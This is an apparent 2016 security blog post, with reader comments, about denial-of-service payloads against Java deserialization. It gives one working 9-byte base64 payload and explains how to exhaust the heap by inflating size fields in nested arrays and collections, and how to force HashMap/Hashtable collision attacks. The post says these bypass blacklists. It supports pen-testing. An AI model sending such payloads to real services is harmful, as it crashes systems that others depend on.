Friday, April 1, 2016

Java Deserialization DoS - payloads

Handy payloads for testing Java Deserialization vulnerability

GitHub project:

Update: A new attack vector against ObjectInputStream.readProxyDesc() using just 9 bytes: rO0ABX1////3


  • Generic heap overflow
  • Heap overflow using nested Object[] arrays 
  • Heap overflow using nested ArrayList
  • Heap overflow using nested HashMap
  • HashMap and Hashtable collisions attacks

Can be used to bypass blacklist protections or whitelists allowing Object[] array, ArrayList or HashMap.

Payloads to consume 8GB of heap:

Generic (9 bytes): 


Nested Object[] (44 bytes): 


Nested ArrayList (67 bytes):


Nested HashMap (110 bytes):



114 bytes to consume 64GB of heap (nested Object[]):


Short description of Heap overflow attacks

In order to minimize the size of payload I play with "size" field of the classes to overwrite serialized data so that the "size" is near Integer.MAX_VALUE, even though there are only few entries inside the payload.

During deserialization the classes pre-allocate big arrays (based on "size") to be filled with values before actual reading the values happen. Therefore it's not necessary to send all values, OutOfMemoryError is thrown after few allocations for nested objects ... Object[] can contain another Object[].

Let's look at the Object[] payload. It was modified to have max possible size for arrays: ArrayList.MAX_ARRAY_SIZE = Integer.MAX_VALUE - 8 This means array of 2 billion of pointers (each 4 bytes) => 2^9 * 4B = 8GB

Having 8 such Object[] arrays nested one inside another, JVM allocates 8GB array for the root array object, then reads first item ... nested Object[] which is again max-sized array. So allocates another 8GB and continues to deserialize 2nd level array with another 8GB, etc. etc., sooner or later fails with OutOfMemoryError.

Short description of HashMap and Hashtable collision attacks

HashMap in Java 1.7, when created with initialCapacity == loadFactor, create one and only one bucket to store all items. 

Hashtable during deserialization suffers similar condition and allows negative loadFactor => using just one bucket to store all items.

Other info

Please use only for your pen-testing / evaluation of your products.

Reported to Oracle in 2015 with "won't fix" response. Hashtable negative loadFactor bug is treated as a functional bug and should be fixed in one of future releases.


  1. The Nested HashMap payload is throwing '', because the 'size' field of the HashMap is transient.

  2. I didn't saw the exception, try the github project to test it.

    'size' is transient but it's explicitly written

    And then it's read as 'mappings'

    1. This comment has been removed by the author.

    2. This comment has been removed by the author.

    3. while deserializing it throws exception. In the code you are ignoring the exception. Try to print the stacktrace. I'm using Oracle JDK.

      catch (OptionalDataException e) {
      // expected

    4. And, In the case of ArrayList, the serialization itself throws exception (IndexOutOfBounds exception:10). In the code you are ignoring the exception. I'm using Oracle JDK.

    5. I see, yes it throws exceptions.

      But they are expected because we change internal state of ArrayList/HashMap and serialization/deserialization is not prepared for that. OptionalDataException is thrown because there are not that many items serialized as the code expects. But during deserialization the arrays are already initialized and consumed the heap.

      What's your point?

  3. This comment has been removed by the author.

  4. This comment has been removed by the author.